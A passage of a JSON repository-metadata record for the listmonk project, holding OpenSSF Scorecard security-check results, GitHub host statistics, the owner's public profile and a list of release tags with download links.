.github/workflows/issues.yml:1","Warn: topLevel permissions set to 'write-all': .github/workflows/release.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU Affero General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:48: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/issues.yml:11: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/issues.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:49: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:3","Warn: pipCommand not pinned by hash: .github/workflows/github-pages.yml:27","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v5.0.3 not signed: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 not signed: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 not signed: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/184955432","Warn: release artifact v5.0.3 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/184955432"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"SAST","score":2,"reason":"SAST tool is not run on all commits -- score normalized to 2","details":["Warn: 4 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-w455-mfq9-hf74","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-9hcv-j9pv-qmph","Warn: Project is vulnerable to: GHSA-w9jx-4g6g-rp7x","Warn: Project is vulnerable to: GHSA-438c-3975-5x3f","Warn: Project is vulnerable to: GHSA-5359-pvf2-pw78","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-q7pp-wcgr-pffx"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-16T13:33:46.690Z","repository_id":37385001,"created_at":"2025-08-16T13:33:46.690Z","updated_at":"2025-08-16T13:33:46.690Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36904960,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-25T02:00:06.831Z","response_time":104,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"knadh","name":"Kailash Nadh","uuid":"547147","kind":"user","description":"Hobbyist developer | CTO @zerodha | Volunteer @fossunited @rainmatter-foundation  @indic-archive ","email":"","website":"https://nadh.in","location":"Bengaluru","twitter":null,"company":"Zerodha","icon_url":"https://avatars.githubusercontent.com/u/547147?u=2bfb14ccb1422e941579fc76643fa6765b86fdc9\u0026v=4","repositories_count":66,"last_synced_at":"2024-04-16T23:34:40.781Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/knadh","funding_links":[],"total_stars":24760,"followers":8406,"following":0,"created_at":"2022-11-02T16:51:40.399Z","updated_at":"2024-04-16T23:34:50.910Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh/repositories"},"tags":[{"name":"v6.2.0","sha":"ef0a75872463f10a4848af6c547d1c057405453a","kind":"tag","published_at":"2026-06-26T10:19:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0/manifests"},{"name":"v6.1.0","sha":"1b5e8d38c778e869003486d3c38bc7a964661e91","kind":"tag","published_at":"2026-03-29T13:15:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0/manifests"},{"name":"nightly","sha":"85931b7dd02346a8363dc7658aee91316deee534","kind":"commit","published_at":"2026-01-24T07:49:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/nightly","html_url":"https://github.com/knadh/listmonk/releases/tag/nightly","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@nightly","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly/manifests"},{"name":"v6.0.0","sha":"00f303c25b925e2e2b33f515f53a704c8d1e1645","kind":"tag","published_at":"2026-01-02T17:40:18.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0/manifests"},{"name":"v5.1.0","sha":"30846f84154659ad0b365a3d7c9fe2231dd0d3c2","kind":"tag","published_at":"2025-09-09T17:46:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0/manifests"},{"name":"v5.0.3","sha":"48643aa93ef6d70afe550d8f526546a4931bf695","kind":"tag","published_at":"2025-07-06T16:11:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.3","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","kind":"tag","published_at":"2025-06-08T09:40:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.2","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"dc466fc76bde033d48af5fe89ffbd84bb7e194d3","kind":"tag","published_at":"2025-05-25T09:45:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"3b8a8c23c586dd7b7851844aae91a370e21ecf35","kind":"tag","published_at":"2025-04-28T18:48:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0/manifests"},{"name":"v4.1.0","sha":"0a27de16c6e23b7d4b84d4d91fe59bea10877ad1","kind":"tag","published_at":"2024-11-12T18:40:44.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"f5dfb0cf62f1097545ff315a5c1d9ac540d54b9e","kind":"tag","published_at":"2024-10-28T07:47:30.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"3894571d1ac0b5baa5bcb15a173e4e1020d7a113","kind":"tag","published_at":"2024-10-27T13:25:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"f9120d9b80b1d0d86f27e3f23edfb2ffe6f5b091","kind":"tag","published_at":"2024-02-04T11:18:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v3.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0/manifests"},{"name":"v2.5.1","sha":"a6a2b6982036eb6bebf9a1ff4d58ff4937ea3af1","kind":"tag","published_at":"2023-08-15T15:46:37.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"ea2f93ea066bc612b1161ba76324c11c8e495933","kind":"tag","published_at":"2023-08-10T18:32:51.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"c668523c570519797e1e7f01958fe830378d253e","kind":"tag","published_at":"2023-03-20T13:48:00.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.4.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"448f0e3428535bc93bc942c9867183f5adcaf057","kind":"tag","published_at":"2022-11-27T17:50:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.3.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"bbbf28c5ce981738c485d6d0e94c89df0fef6763","kind":"tag","published_at":"2022-07-30T18:09:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"0ecfb89f19e63da44df393b08cd2b21f90c79605","kind":"tag","published_at":"2022-02-12T15:24:59.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"05585b701b56a9aa1f1a7f1cdadec44c19541055","kind":"tag","published_at":"2021-09-27T17:57:16.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0/manifests"},{"name":"v1.1.0","sha":"b3612927c82bee987c2c2d20322232b9144a3c8a","kind":"tag","published_at":"2021-06-09T14:43:46.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"95a81d17ced9766d40447364de12925b51c844fd","kind":"commit","published_at":"2021-05-16T11:24:55.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0/manifests"},{"name":"v0.9.0-beta","sha":"e90fb1d88d15aea4fc7028cd96b1a274f92ab05e","kind":"commit","published_at":"2021-02-13T12:41:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.9.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.9.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.9.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta/manifests"},{"name":"v0.8.0-beta","sha":"cde0b4b42a3e0e18b7e08d701e5ca4482cd6fe73","kind":"commit","published_at":"2020-11-10T16:51:25.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.8.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.8.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.8.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta/manifests"},{"name":"v0.7.0-alpha","sha":"0f055eacb87030b55970f4870ff3a0b22b0dcaef","kind":"commit","published_at":"2020-08-09T14:32:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.7.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.7.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.7.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha/manifests"},{"name":"v0.6.2-alpha","sha":"82702ed5bc64c4cbc567b561f187bc3f8abe83b5","kind":"commit","published_at":"2020-05-25T06:25:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha/manifests"},{"name":"v0.6.1-alpha","sha":"18329ff052e62e74b9114d4e2126074c9845277b","kind":"commit","published_at":"2020-05-17T15:37:48.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha/manifests"},{"name":"v0.6.0-alpha","sha":"cb331b93418eecaffdfcdcc38c91606328afdf47","kind":"commit","published_at":"2020-05-16T18:09:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha/manifests"},{"name":"v0.5.2-alpha","sha":"b8d9ab10f29d8fc3c3dc0fcfb235ce453d8c58bf","kind":"commit","published_at":"2020-04-02T12:52:56.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha/manifests"},{"name":"v0.5.1-alpha","sha":"21ffe5fb02256a6e391b5e2ebe11554badee5ee5","kind":"commit","published_at":"2020-04-01T14:29:41.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha/manifests"},{"name":"v0.5.0-alpha","sha":"ad9ee7528d34ce19659a7aa963ada18baebddb0b","kind":"commit","published_at":"2020-03-08T10:40:34.0